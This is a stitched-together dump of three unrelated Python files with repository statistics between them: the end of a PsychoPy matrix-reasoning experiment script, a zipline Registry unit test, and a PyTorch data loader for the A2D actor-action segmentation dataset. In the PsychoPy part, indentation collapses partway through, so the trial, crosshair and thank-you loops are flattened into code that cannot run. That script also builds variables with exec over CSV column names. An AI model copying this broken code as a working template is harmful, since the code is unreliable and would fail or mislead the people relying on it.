                visComp.setAutoDraw(True)
        # *Prac2End* keyboard component: any key ends the routine
        if t >= 0.0 and Prac2End.status == NOT_STARTED:
            Prac2End.tStart = t
            Prac2End.frameNStart = frameN  # exact frame index
            Prac2End.status = STARTED
            # keyboard checking is just starting
            win.callOnFlip(Prac2End.clock.reset)  # t=0 on next screen flip
            event.clearEvents(eventType='keyboard')
        if Prac2End.status == STARTED:
            theseKeys = event.getKeys()
            # check for quit:
            if "escape" in theseKeys:
                endExpNow = True
            if len(theseKeys) > 0:  # at least one key was pressed
                Prac2End.keys = theseKeys[-1]  # just the last key pressed
                Prac2End.rt = Prac2End.clock.getTime()
                # a response ends the routine
                continueRoutine = False
        # check if all components have finished
        if not continueRoutine:  # a component has requested a forced-end of Routine
            break
        continueRoutine = False  # will revert to True if at least one component still running
        for thisComponent in Feedback2Components:
            if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
                continueRoutine = True
                break  # at least one component has not yet finished
        # check for quit (the Esc key)
        if endExpNow or event.getKeys(keyList=["escape"]):
            core.quit()
        # refresh the screen
        if continueRoutine:  # don't flip if this routine is over or we'll get a blank screen
            win.flip()
    # -------Ending Routine "Feedback2"-------
    for thisComponent in Feedback2Components:
        if hasattr(thisComponent, "setAutoDraw"):
            thisComponent.setAutoDraw(False)
    # check responses
    if Prac2End.keys in ['', [], None]:  # no response was made
        Prac2End.keys = None
    trials_3.addData('Prac2End.keys', Prac2End.keys)
    if Prac2End.keys is not None:  # we had a response
        trials_3.addData('Prac2End.rt', Prac2End.rt)
    # the Routine "Feedback2" was not non-slip safe, so reset the non-slip timer
    routineTimer.reset()
    # ------Prepare to start Routine "crosshair"-------
    t = 0
    crosshairClock.reset()  # clock
    frameN = -1
    continueRoutine = True
    routineTimer.add(0.500000)  # fixed-duration routine: 0.5 s
    # keep track of which components have finished
    crosshairComponents = [text]
    for thisComponent in crosshairComponents:
        if hasattr(thisComponent, 'status'):
            thisComponent.status = NOT_STARTED
    # -------Start Routine "crosshair"-------
    while continueRoutine and routineTimer.getTime() > 0:
        t = crosshairClock.getTime()
        frameN = frameN + 1  # number of completed frames (so 0 is the first frame)
        # *text* updates — starts immediately
        if t >= 0.0 and text.status == NOT_STARTED:
            text.tStart = t
            text.frameNStart = frameN  # exact frame index
            text.setAutoDraw(True)
        # stop just under one frame before the nominal 0.5 s offset
        frameRemains = 0.0 + 0.5 - win.monitorFramePeriod * 0.75  # most of one frame period left
        if text.status == STARTED and t >= frameRemains:
            text.setAutoDraw(False)
        # check if all components have finished
        if not continueRoutine:  # a component has requested a forced-end of Routine
            break
        continueRoutine = False  # will revert to True if at least one component still running
        for thisComponent in crosshairComponents:
            if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
                continueRoutine = True
                break  # at least one component has not yet finished
        # check for quit (the Esc key)
        if endExpNow or event.getKeys(keyList=["escape"]):
            core.quit()
        # refresh the screen
        if continueRoutine:  # don't flip if this routine is over or we'll get a blank screen
            win.flip()
    # -------Ending Routine "crosshair"-------
    for thisComponent in crosshairComponents:
        if hasattr(thisComponent, "setAutoDraw"):
            thisComponent.setAutoDraw(False)
    thisExp.nextEntry()
# completed 1 repeats of 'trials_3'
# ------Prepare to start Routine "GetReady"-------
# Displays the GetReady2 stimulus and waits for any keypress to continue.
t = 0
GetReadyClock.reset()  # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
GetReadyResp = event.BuilderKeyResponse()
# keep track of which components have finished
GetReadyComponents = [GetReady2, GetReadyResp]
for thisComponent in GetReadyComponents:
    if hasattr(thisComponent, 'status'):
        thisComponent.status = NOT_STARTED
# -------Start Routine "GetReady"-------
while continueRoutine:
    # get current time
    t = GetReadyClock.getTime()
    frameN = frameN + 1  # number of completed frames (so 0 is the first frame)
    # *GetReady2* updates
    if t >= 0.0 and GetReady2.status == NOT_STARTED:
        # keep track of start time/frame for later
        GetReady2.tStart = t
        GetReady2.frameNStart = frameN  # exact frame index
        GetReady2.setAutoDraw(True)
    # *GetReadyResp* updates
    if t >= 0.0 and GetReadyResp.status == NOT_STARTED:
        # keep track of start time/frame for later
        GetReadyResp.tStart = t
        GetReadyResp.frameNStart = frameN  # exact frame index
        GetReadyResp.status = STARTED
        # keyboard checking is just starting
        win.callOnFlip(GetReadyResp.clock.reset)  # t=0 on next screen flip
        event.clearEvents(eventType='keyboard')
    if GetReadyResp.status == STARTED:
        theseKeys = event.getKeys()
        # check for quit:
        if "escape" in theseKeys:
            endExpNow = True
        if len(theseKeys) > 0:  # at least one key was pressed
            GetReadyResp.keys = theseKeys[-1]  # just the last key pressed
            GetReadyResp.rt = GetReadyResp.clock.getTime()
            # a response ends the routine
            continueRoutine = False
    # check if all components have finished
    if not continueRoutine:  # a component has requested a forced-end of Routine
        break
    continueRoutine = False  # will revert to True if at least one component still running
    for thisComponent in GetReadyComponents:
        if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
            continueRoutine = True
            break  # at least one component has not yet finished
    # check for quit (the Esc key)
    if endExpNow or event.getKeys(keyList=["escape"]):
        core.quit()
    # refresh the screen
    if continueRoutine:  # don't flip if this routine is over or we'll get a blank screen
        win.flip()
# -------Ending Routine "GetReady"-------
for thisComponent in GetReadyComponents:
    if hasattr(thisComponent, "setAutoDraw"):
        thisComponent.setAutoDraw(False)
# check responses
if GetReadyResp.keys in ['', [], None]:  # no response was made
    GetReadyResp.keys = None
thisExp.addData('GetReadyResp.keys', GetReadyResp.keys)
if GetReadyResp.keys is not None:  # identity test with None, not != (PEP 8 E711)
    thisExp.addData('GetReadyResp.rt', GetReadyResp.rt)
thisExp.nextEntry()
# the Routine "GetReady" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# ------Prepare to start Routine "crosshair"-------
t = 0
crosshairClock.reset()  # clock
frameN = -1
continueRoutine = True
routineTimer.add(0.500000)  # fixed-duration routine: 0.5 s
# keep track of which components have finished
crosshairComponents = [text]
for thisComponent in crosshairComponents:
    if hasattr(thisComponent, 'status'):
        thisComponent.status = NOT_STARTED
# -------Start Routine "crosshair"-------
while continueRoutine and routineTimer.getTime() > 0:
    # get current time
    t = crosshairClock.getTime()
    frameN = frameN + 1  # number of completed frames (so 0 is the first frame)
    # *text* updates — starts immediately
    if t >= 0.0 and text.status == NOT_STARTED:
        text.tStart = t
        text.frameNStart = frameN  # exact frame index
        text.setAutoDraw(True)
    # stop just under one frame before the nominal 0.5 s offset
    frameRemains = 0.0 + 0.5 - win.monitorFramePeriod * 0.75  # most of one frame period left
    if text.status == STARTED and t >= frameRemains:
        text.setAutoDraw(False)
    # check if all components have finished
    if not continueRoutine:  # a component has requested a forced-end of Routine
        break
    continueRoutine = False  # will revert to True if at least one component still running
    for thisComponent in crosshairComponents:
        if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
            continueRoutine = True
            break  # at least one component has not yet finished
    # check for quit (the Esc key)
    if endExpNow or event.getKeys(keyList=["escape"]):
        core.quit()
    # refresh the screen
    if continueRoutine:  # don't flip if this routine is over or we'll get a blank screen
        win.flip()
# -------Ending Routine "crosshair"-------
for thisComponent in crosshairComponents:
    if hasattr(thisComponent, "setAutoDraw"):
        thisComponent.setAutoDraw(False)
# set up handler to look after randomisation of conditions etc
# (sequential, single repeat, rows 2-19 of the conditions file)
trials_2 = data.TrialHandler(nReps=1, method='sequential',
    extraInfo=expInfo, originPath=-1,
    trialList=data.importConditions('Matrices.csv', selection='[2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19]'),
    seed=None, name='trials_2')
thisExp.addLoop(trials_2)  # add the loop to the experiment
thisTrial_2 = trials_2.trialList[0]  # so we can initialise stimuli with some values
# abbreviate parameter names if possible (e.g. rgb = thisTrial_2.rgb)
if thisTrial_2 is not None:  # identity test with None, not != (PEP 8 E711)
    for paramName in thisTrial_2.keys():
        # NOTE(review): exec over condition-file column names is PsychoPy
        # Builder boilerplate; safe only while 'Matrices.csv' is trusted.
        exec(paramName + '= thisTrial_2.' + paramName)
for thisTrial_2 in trials_2:
currentLoop = trials_2
# abbreviate parameter names if possible (e.g. rgb = thisTrial_2.rgb)
if thisTrial_2 != None:
for paramName in thisTrial_2.keys():
exec(paramName + '= thisTrial_2.' + paramName)
# ------Prepare to start Routine "trial"-------
t = 0
trialClock.reset()  # clock
frameN = -1
continueRoutine = True
# update component parameters for each repeat
image.setImage(Stimulus)
image.setSize((430, 380))
CFig1.setImage(Choice1)
CFig2.setImage(Choice2)
CFig3.setImage(Choice3)
CFig4.setImage(Choice4)
CFIg6.setImage(Choice6)
key_resp_2 = event.BuilderKeyResponse()
CFig7.setImage(Choice7)
CFig8.setImage(Choice8)
# keep track of which components have finished
trialComponents = [image, CFig1, CFig2, CFig3, CFig4, CFig5, CFIg6, Opt1, Opt2, Opt3, Opt4, Opt5, key_resp_2, CFig7, CFig8, Opt6, Opt7, Opt8]
for thisComponent in trialComponents:
    if hasattr(thisComponent, 'status'):
        thisComponent.status = NOT_STARTED
# -------Start Routine "trial"-------
while continueRoutine:
    # get current time
    t = trialClock.getTime()
    frameN = frameN + 1  # number of completed frames (so 0 is the first frame)
    # start pre-response visual stimuli (tuple order preserves the original
    # setAutoDraw call order, and hence draw order)
    for visComp in (image, CFig1, CFig2, CFig3, CFig4, CFig5, CFIg6,
                    Opt1, Opt2, Opt3, Opt4, Opt5):
        if t >= 0.0 and visComp.status == NOT_STARTED:
            visComp.tStart = t
            visComp.frameNStart = frameN  # exact frame index
            visComp.setAutoDraw(True)
    if CFig5.status == STARTED:  # only update if drawing
        CFig5.setImage(Choice5, log=False)
    # *key_resp_2* updates
    if t >= 0.0 and key_resp_2.status == NOT_STARTED:
        key_resp_2.tStart = t
        key_resp_2.frameNStart = frameN  # exact frame index
        key_resp_2.status = STARTED
        # keyboard checking is just starting
        win.callOnFlip(key_resp_2.clock.reset)  # t=0 on next screen flip
        event.clearEvents(eventType='keyboard')
    if key_resp_2.status == STARTED:
        theseKeys = event.getKeys(keyList=['1', '2', '3', '4', '5', '6', '7', '8'])
        # check for quit:
        if "escape" in theseKeys:
            endExpNow = True
        if len(theseKeys) > 0:  # at least one key was pressed
            key_resp_2.keys = theseKeys[-1]  # just the last key pressed
            key_resp_2.rt = key_resp_2.clock.getTime()
            # score against Corr (compared both as string and raw value)
            if (key_resp_2.keys == str(Corr)) or (key_resp_2.keys == Corr):
                key_resp_2.corr = 1
            else:
                key_resp_2.corr = 0
            # a response ends the routine
            continueRoutine = False
    # start the remaining visual stimuli (originally listed after key_resp_2)
    for visComp in (CFig7, CFig8, Opt6, Opt7, Opt8):
        if t >= 0.0 and visComp.status == NOT_STARTED:
            visComp.tStart = t
            visComp.frameNStart = frameN  # exact frame index
            visComp.setAutoDraw(True)
    # check if all components have finished
    if not continueRoutine:  # a component has requested a forced-end of Routine
        break
    continueRoutine = False  # will revert to True if at least one component still running
    for thisComponent in trialComponents:
        if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
            continueRoutine = True
            break  # at least one component has not yet finished
    # check for quit (the Esc key)
    if endExpNow or event.getKeys(keyList=["escape"]):
        core.quit()
    # refresh the screen
    if continueRoutine:  # don't flip if this routine is over or we'll get a blank screen
        win.flip()
# -------Ending Routine "trial"-------
for thisComponent in trialComponents:
    if hasattr(thisComponent, "setAutoDraw"):
        thisComponent.setAutoDraw(False)
# check responses
if key_resp_2.keys in ['', [], None]:  # no response was made
    key_resp_2.keys = None
    # was no response the correct answer?!
    if str(Corr).lower() == 'none':
        key_resp_2.corr = 1  # correct non-response
    else:
        key_resp_2.corr = 0  # failed to respond (incorrectly)
# store data for trials_2 (TrialHandler)
trials_2.addData('key_resp_2.keys', key_resp_2.keys)
trials_2.addData('key_resp_2.corr', key_resp_2.corr)
if key_resp_2.keys is not None:  # we had a response
    trials_2.addData('key_resp_2.rt', key_resp_2.rt)
# the Routine "trial" was not non-slip safe, so reset the non-slip timer
routineTimer.reset()
# ------Prepare to start Routine "crosshair"-------
t = 0
crosshairClock.reset() # clock
frameN = -1
continueRoutine = True
routineTimer.add(0.500000)
# update component parameters for each repeat
# keep track of which components have finished
crosshairComponents = [text]
for thisComponent in crosshairComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "crosshair"-------
while continueRoutine and routineTimer.getTime() > 0:
# get current time
t = crosshairClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *text* updates
if t >= 0.0 and text.status == NOT_STARTED:
# keep track of start time/frame for later
text.tStart = t
text.frameNStart = frameN # exact frame index
text.setAutoDraw(True)
frameRemains = 0.0 + 0.5- win.monitorFramePeriod * 0.75 # most of one frame period left
if text.status == STARTED and t >= frameRemains:
text.setAutoDraw(False)
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in crosshairComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "crosshair"-------
for thisComponent in crosshairComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
thisExp.nextEntry()
# completed 1 repeats of 'trials_2'
# ------Prepare to start Routine "ThankYou"-------
t = 0
ThankYouClock.reset() # clock
frameN = -1
continueRoutine = True
routineTimer.add(3.000000)
# update component parameters for each repeat
# keep track of which components have finished
ThankYouComponents = [text_2]
for thisComponent in ThankYouComponents:
if hasattr(thisComponent, 'status'):
thisComponent.status = NOT_STARTED
# -------Start Routine "ThankYou"-------
while continueRoutine and routineTimer.getTime() > 0:
# get current time
t = ThankYouClock.getTime()
frameN = frameN + 1 # number of completed frames (so 0 is the first frame)
# update/draw components on each frame
# *text_2* updates
if t >= 0.0 and text_2.status == NOT_STARTED:
# keep track of start time/frame for later
text_2.tStart = t
text_2.frameNStart = frameN # exact frame index
text_2.setAutoDraw(True)
frameRemains = 0.0 + 3- win.monitorFramePeriod * 0.75 # most of one frame period left
if text_2.status == STARTED and t >= frameRemains:
text_2.setAutoDraw(False)
# check if all components have finished
if not continueRoutine: # a component has requested a forced-end of Routine
break
continueRoutine = False # will revert to True if at least one component still running
for thisComponent in ThankYouComponents:
if hasattr(thisComponent, "status") and thisComponent.status != FINISHED:
continueRoutine = True
break # at least one component has not yet finished
# check for quit (the Esc key)
if endExpNow or event.getKeys(keyList=["escape"]):
core.quit()
# refresh the screen
if continueRoutine: # don't flip if this routine is over or we'll get a blank screen
win.flip()
# -------Ending Routine "ThankYou"-------
for thisComponent in ThankYouComponents:
if hasattr(thisComponent, "setAutoDraw"):
thisComponent.setAutoDraw(False)
# these shouldn't be strictly necessary (should auto-save)
thisExp.saveAsWideText(filename+'.csv')
thisExp.saveAsPickle(filename)
logging.flush()
# make sure everything is closed down
thisExp.abort() # or data files will save again on exit
win.close()
core.quit()
| 39.903857 | 443 | 0.617957 | 9,260 | 73,463 | 4.868467 | 0.062419 | 0.004481 | 0.020252 | 0.017324 | 0.863782 | 0.847145 | 0.837496 | 0.82554 | 0.811987 | 0.800785 | 0 | 0.041063 | 0.271361 | 73,463 | 1,840 | 444 | 39.925543 | 0.801151 | 0.252944 | 0 | 0.836782 | 0 | 0.003831 | 0.059847 | 0.002301 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.008429 | 0 | 0.008429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6f1d737d3a7f0427f0cafa4a5dd8505b834f61f8 | 3,699 | py | Python | tests/test_registration_manager.py | Hertz-and-Alpha/zipline-reloaded | eea4a2ccfc03d7fa4946defcb3cdf23469e4ae39 | [
"Apache-2.0"
] | 254 | 2021-03-29T16:18:39.000Z | 2022-03-31T22:06:01.000Z | tests/test_registration_manager.py | Hertz-and-Alpha/zipline-reloaded | eea4a2ccfc03d7fa4946defcb3cdf23469e4ae39 | [
"Apache-2.0"
] | 52 | 2021-04-06T01:46:24.000Z | 2022-03-29T20:54:19.000Z | tests/test_registration_manager.py | Hertz-and-Alpha/zipline-reloaded | eea4a2ccfc03d7fa4946defcb3cdf23469e4ae39 | [
"Apache-2.0"
] | 53 | 2021-04-05T14:43:29.000Z | 2022-03-31T22:06:04.000Z | from zipline.extensions import Registry
import pytest
import re
class FakeInterface:
pass
class TestRegistrationManager:
def test_load_not_registered(self):
rm = Registry(FakeInterface)
msg = (
"no FakeInterface factory registered under name 'ayy-lmao',"
" options are: []"
)
with pytest.raises(ValueError, match=re.escape(msg)):
rm.load("ayy-lmao")
# register in reverse order to test the sorting of the options
rm.register("c", FakeInterface)
rm.register("b", FakeInterface)
rm.register("a", FakeInterface)
msg = (
"no FakeInterface factory registered under name 'ayy-lmao', "
"options are: ['a', 'b', 'c']"
)
with pytest.raises(ValueError, match=re.escape(msg)):
rm.load("ayy-lmao")
def test_register_decorator(self):
rm = Registry(FakeInterface)
@rm.register("ayy-lmao")
class ProperDummyInterface(FakeInterface):
pass
def check_registered():
assert rm.is_registered(
"ayy-lmao"
), "Class ProperDummyInterface wasn't properly registered under \n name 'ayy-lmao'"
assert isinstance(rm.load("ayy-lmao"), ProperDummyInterface)
# Check that we successfully registered.
check_registered()
# Try and fail to register with the same key again.
msg = "FakeInterface factory with name 'ayy-lmao' is already registered"
with pytest.raises(ValueError, match=msg):
@rm.register("ayy-lmao")
class Fake(object):
pass
# assert excinfo.value.args == msg
# check that the failed registration didn't break the previous
# registration
check_registered()
# Unregister the key and assert that the key is now gone.
rm.unregister("ayy-lmao")
msg = (
"no FakeInterface factory registered under name 'ayy-lmao', "
"options are: []"
)
with pytest.raises(ValueError, match=re.escape(msg)):
rm.load("ayy-lmao")
msg = "FakeInterface factory 'ayy-lmao' was not already registered"
with pytest.raises(ValueError, match=msg):
rm.unregister("ayy-lmao")
def test_register_non_decorator(self):
rm = Registry(FakeInterface)
class ProperDummyInterface(FakeInterface):
pass
rm.register("ayy-lmao", ProperDummyInterface)
def check_registered():
assert rm.is_registered(
"ayy-lmao"
), "Class ProperDummyInterface wasn't properly registered under name 'ayy-lmao'"
assert isinstance(rm.load("ayy-lmao"), ProperDummyInterface)
# Check that we successfully registered.
check_registered()
class Fake(object):
pass
# Try and fail to register with the same key again.
msg = "FakeInterface factory with name 'ayy-lmao' is already registered"
with pytest.raises(ValueError, match=msg):
rm.register("ayy-lmao", Fake)
# check that the failed registration didn't break the previous
# registration
check_registered()
rm.unregister("ayy-lmao")
msg = (
"no FakeInterface factory registered under name 'ayy-lmao', "
"options are: []"
)
with pytest.raises(ValueError, match=re.escape(msg)):
rm.load("ayy-lmao")
msg = "FakeInterface factory 'ayy-lmao' was not already registered"
with pytest.raises(ValueError, match=msg):
rm.unregister("ayy-lmao")
| 31.347458 | 95 | 0.602325 | 399 | 3,699 | 5.54386 | 0.195489 | 0.082278 | 0.039783 | 0.094033 | 0.78255 | 0.724231 | 0.724231 | 0.724231 | 0.724231 | 0.724231 | 0 | 0 | 0.301433 | 3,699 | 117 | 96 | 31.615385 | 0.856037 | 0.128413 | 0 | 0.74026 | 0 | 0 | 0.261208 | 0 | 0 | 0 | 0 | 0 | 0.051948 | 1 | 0.064935 | false | 0.064935 | 0.038961 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
6f5694943b63c88aa038b1e94e101ad9b77c88c6 | 14,938 | py | Python | csc_249_final_proj_a2d_cls/loader/a2d_dataset.py | Brainsanity/VisualCortex_ActorAction | a4ad3951aa78a98d9f876f323bcbaba7cd48180c | [
"MIT"
] | null | null | null | csc_249_final_proj_a2d_cls/loader/a2d_dataset.py | Brainsanity/VisualCortex_ActorAction | a4ad3951aa78a98d9f876f323bcbaba7cd48180c | [
"MIT"
] | null | null | null | csc_249_final_proj_a2d_cls/loader/a2d_dataset.py | Brainsanity/VisualCortex_ActorAction | a4ad3951aa78a98d9f876f323bcbaba7cd48180c | [
"MIT"
] | null | null | null | import os
import sys
sys.path.append('')
import random
import numpy as np
import cv2
import h5py
import torch
from torch.utils.data import Dataset, DataLoader
import loader.transforms as tf
from cfg.deeplab_pretrain_a2d import train as train_cfg
from cfg.deeplab_pretrain_a2d import val as val_cfg
from cfg.deeplab_pretrain_a2d import test as test_cfg
from torchvision import transforms
def to_cls(image_label, num_class):
'''
:param image_label:
:return: label encoding for multi-label multi-class training
'''
image_label.flatten()
label = np.zeros(num_class)
for i in range(num_class):
if i in image_label:
label[i] = 1
return label
class A2DDataset(Dataset):
#num_class = 43
num_class_orig = 80
ignore_label = 255
background_label = 0
# 35+8=43 valid classes
valid_cls = [
11, 12, 13, 15, 16, 17, 18, 19, # 1-8
21, 22, 26, 28, 29, # 9-13
34, 35, 36, 39, # 14-17
41, 43, 44, 45, 46, 48, 49, # 18-24
54, 55, 56, 57, 59, # 25-29
61, 63, 65, 66, 67, 68, 69, # 30-36
72, 73, 75, 76, 77, 78, 79] # 37-43
num_valid_cls = len(valid_cls)
convert_label = dict()
convert_label_back = dict()
for i, label in enumerate(valid_cls):
convert_label[label] = i
convert_label_back[i] = label
label_80to43 = np.ones((num_class_orig))*255
for label in range(num_class_orig):
if label in convert_label:
label_80to43[label] = convert_label[label]
label_80to43 = label_80to43.astype(np.uint8)
#print(label_80to43)
label_43to80 = np.ones((num_valid_cls))*255
for i in range(num_valid_cls):
label_43to80[i] = convert_label_back[i]
label_43to80 = label_43to80.astype(np.uint8)
# official color map
cmap = np.array([[0,0,0], # 0
#[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0], # 1-10
[255,0,0],[255,0,0],[255,0,0],[255,0,0],[255,0,0],[255,0,0],[255,0,0],[0,0,0],[0,0,0],[0,0,0], # 1-10
[52,1,1],[103,1,1],[154,1,1],[205,1,1],[255,1,1], # 11-15
[255,51,51],[255,103,103],[255,154,154],[255,205,205],[0,0,0], # 16-20
[52,46,1],[103,92,1],[154,138,1],[205,184,1],[255,230,1], # 21-25
[255,235,51],[255,240,103],[255,245,154],[255,250,205],[0,0,0], # 26-30
[11,52,1],[21,103,1],[31,154,1],[41,205,1],[52,255,1], # 31-35
[92,255,51],[133,255,103],[174,255,154],[215,255,205],[0,0,0], # 36-40
[1,52,36],[1,103,72],[1,154,108],[1,205,143],[1,255,179], #41-45
[51,255,194],[103,255,210],[154,255,225],[205,255,240],[0,0,0], # 46-50
[1,21,52],[1,41,103],[1,62,154],[1,82,205],[1,103,255], # 51-55
[51,133,255],[103,164,255],[154,194,255],[205,225,255],[0,0,0], # 56-60
[26,1,52],[52,1,103],[77,1,154],[103,1,205],[128,1,255], # 61-65
[154,51,255],[179,103,255],[205,154,255],[230,205,255],[0,0,0], #66-70
[52,1,31],[103,1,62],[154,1,92],[205,1,123],[255,1,153], #71-75
[255,51,174],[255,103,194],[255,154,215],[255,205,235] #76-79
])
cmap = cmap.astype(np.uint8)
# 80=1(bg) + 9+7(none) + 7(actor)*9(action)
class_names = np.array([
'background',
'none', 'none', 'none', 'none', 'none', 'none', 'none', 'none', 'none',
'none',
'adult-climbing',
'adult-crawling',
'adult-eating',
'adult-flying',
'adult-jumping',
'adult-rolling',
'adult-running',
'adult-walking',
'adult-none',
'none',
'baby-climbing',
'baby-crawling',
'baby-eating',
'baby-flying',
'baby-jumping',
'baby-rolling',
'baby-running',
'baby-walking',
'baby-none',
'none',
'ball-climbing',
'ball-crawling',
'ball-eating',
'ball-flying',
'ball-jumping',
'ball-rolling',
'ball-running',
'ball-walking',
'ball-none',
'none',
'bird-climbing',
'bird-crawling',
'bird-eating',
'bird-flying',
'bird-jumping',
'bird-rolling',
'bird-running',
'bird-walking',
'bird-none',
'none',
'car-climbing',
'car-crawling',
'car-eating',
'car-flying',
'car-jumping',
'car-rolling',
'car-running',
'car-walking',
'car-none',
'none',
'cat-climbing',
'cat-crawling',
'cat-eating',
'cat-flying',
'cat-jumping',
'cat-rolling',
'cat-running',
'cat-walking',
'cat-none',
'none',
'dog-climbing',
'dog-crawling',
'dog-eating',
'dog-flying',
'dog-jumping',
'dog-rolling',
'dog-running',
'dog-walking',
'dog-none',
])
def __init__(self, config, dataset_path):
super(A2DDataset, self).__init__()
with open(
os.path.join(dataset_path, 'list',
config.data_list + '.txt')) as f:
self.img_list = []
for line in f:
if line[-1] == '\n':
self.img_list.append(line[:-1])
else:
self.img_list.append(line)
self.img_dir = os.path.join(dataset_path, 'pngs320H')
self.gt_dir = os.path.join(dataset_path, 'Annotations/mat')
self.config = config
self.class_names = [A2DDataset.class_names[cls] for cls in A2DDataset.valid_cls]
def __len__(self):
return len(self.img_list)
def __getitem__(self, idx):
vd_frame_idx = self.img_list[idx]
image_path = os.path.join(self.img_dir, vd_frame_idx + '.png')
image = cv2.imread(image_path).astype(np.float32)
gt_load_path = os.path.join(self.gt_dir, vd_frame_idx + '.mat')
label_orig = h5py.File(gt_load_path,'r')['reS_id']
label_orig = np.transpose(label_orig)
label = label_orig #A2DDataset.label_80to43[label_orig]
# flip
if hasattr(self.config, 'flip') and self.config.flip:
image, label = tf.group_random_flip([image, label])
if hasattr(self.config, 'crop_policy'):
target_size = self.config.crop_size
if self.config.crop_policy == 'none':
# resize
image, label = tf.group_rescale([image, label],
#self.config.scale_factor,
target_size,
[cv2.INTER_LINEAR, cv2.INTER_NEAREST])
else:
# resize -> crop -> pad
image, label = tf.group_rescale([image, label],
self.config.scale_factor,
[cv2.INTER_LINEAR, cv2.INTER_NEAREST])
if self.config.crop_policy == 'random':
image, label = tf.group_random_crop([image, label], target_size)
image, label = tf.group_random_pad(
[image, label], target_size,
[self.config.input_mean, A2DDataset.background_label])
elif self.config.crop_policy == 'center':
image, label = tf.group_center_crop([image, label], target_size)
image, label = tf.group_concer_pad(
[image, label], target_size,
[self.config.input_mean, A2DDataset.background_label])
else:
ValueError('Unknown crop policy: {}'.format(
self.config.crop_policy))
if hasattr(self.config, 'rotation') and random.random() < 0.5:
image, label = tf.group_rotation(
[image, label], self.config.rotation,
[cv2.INTER_LINEAR, cv2.INTER_NEAREST],
[self.config.input_mean, A2DDataset.background_label])
# blur
if hasattr(self.config,
'blur') and self.config.blur and random.random() < 0.5:
image = tf.blur(image)
image = cv2.resize(image, (224, 224))
transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.485, 0.456, 0.406),
(0.229, 0.224, 0.225))])
image = transform(image)
image = image.contiguous().float()
label = A2DDataset.label_80to43[label_orig]
label = to_cls(label, 43)
label = torch.from_numpy(label).contiguous().long()
return image, label
class A2DDataset_test(Dataset):
num_class_orig = 80
ignore_label = 255
background_label = 0
# 35+8=43 valid classes
valid_cls = [
11, 12, 13, 15, 16, 17, 18, 19, # 1-8
21, 22, 26, 28, 29, # 9-13
34, 35, 36, 39, # 14-17
41, 43, 44, 45, 46, 48, 49, # 18-24
54, 55, 56, 57, 59, # 25-29
61, 63, 65, 66, 67, 68, 69, # 30-36
72, 73, 75, 76, 77, 78, 79] # 37-43
num_valid_cls = len(valid_cls)
convert_label = dict()
convert_label_back = dict()
for i, label in enumerate(valid_cls):
convert_label[label] = i
convert_label_back[i] = label
label_80to43 = np.ones((num_class_orig))*255
for label in range(num_class_orig):
if label in convert_label:
label_80to43[label] = convert_label[label]
label_80to43 = label_80to43.astype(np.uint8)
#print(label_80to43)
label_43to80 = np.ones((num_valid_cls))*255
for i in range(num_valid_cls):
label_43to80[i] = convert_label_back[i]
label_43to80 = label_43to80.astype(np.uint8)
# official color map
cmap = np.array([[0,0,0], # 0
#[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0], # 1-10
[255,0,0],[255,0,0],[255,0,0],[255,0,0],[255,0,0],[255,0,0],[255,0,0],[0,0,0],[0,0,0],[0,0,0], # 1-10
[52,1,1],[103,1,1],[154,1,1],[205,1,1],[255,1,1], # 11-15
[255,51,51],[255,103,103],[255,154,154],[255,205,205],[0,0,0], # 16-20
[52,46,1],[103,92,1],[154,138,1],[205,184,1],[255,230,1], # 21-25
[255,235,51],[255,240,103],[255,245,154],[255,250,205],[0,0,0], # 26-30
[11,52,1],[21,103,1],[31,154,1],[41,205,1],[52,255,1], # 31-35
[92,255,51],[133,255,103],[174,255,154],[215,255,205],[0,0,0], # 36-40
[1,52,36],[1,103,72],[1,154,108],[1,205,143],[1,255,179], #41-45
[51,255,194],[103,255,210],[154,255,225],[205,255,240],[0,0,0], # 46-50
[1,21,52],[1,41,103],[1,62,154],[1,82,205],[1,103,255], # 51-55
[51,133,255],[103,164,255],[154,194,255],[205,225,255],[0,0,0], # 56-60
[26,1,52],[52,1,103],[77,1,154],[103,1,205],[128,1,255], # 61-65
[154,51,255],[179,103,255],[205,154,255],[230,205,255],[0,0,0], #66-70
[52,1,31],[103,1,62],[154,1,92],[205,1,123],[255,1,153], #71-75
[255,51,174],[255,103,194],[255,154,215],[255,205,235] #76-79
])
cmap = cmap.astype(np.uint8)
# 80=1(bg) + 9+7(none) + 7(actor)*9(action)
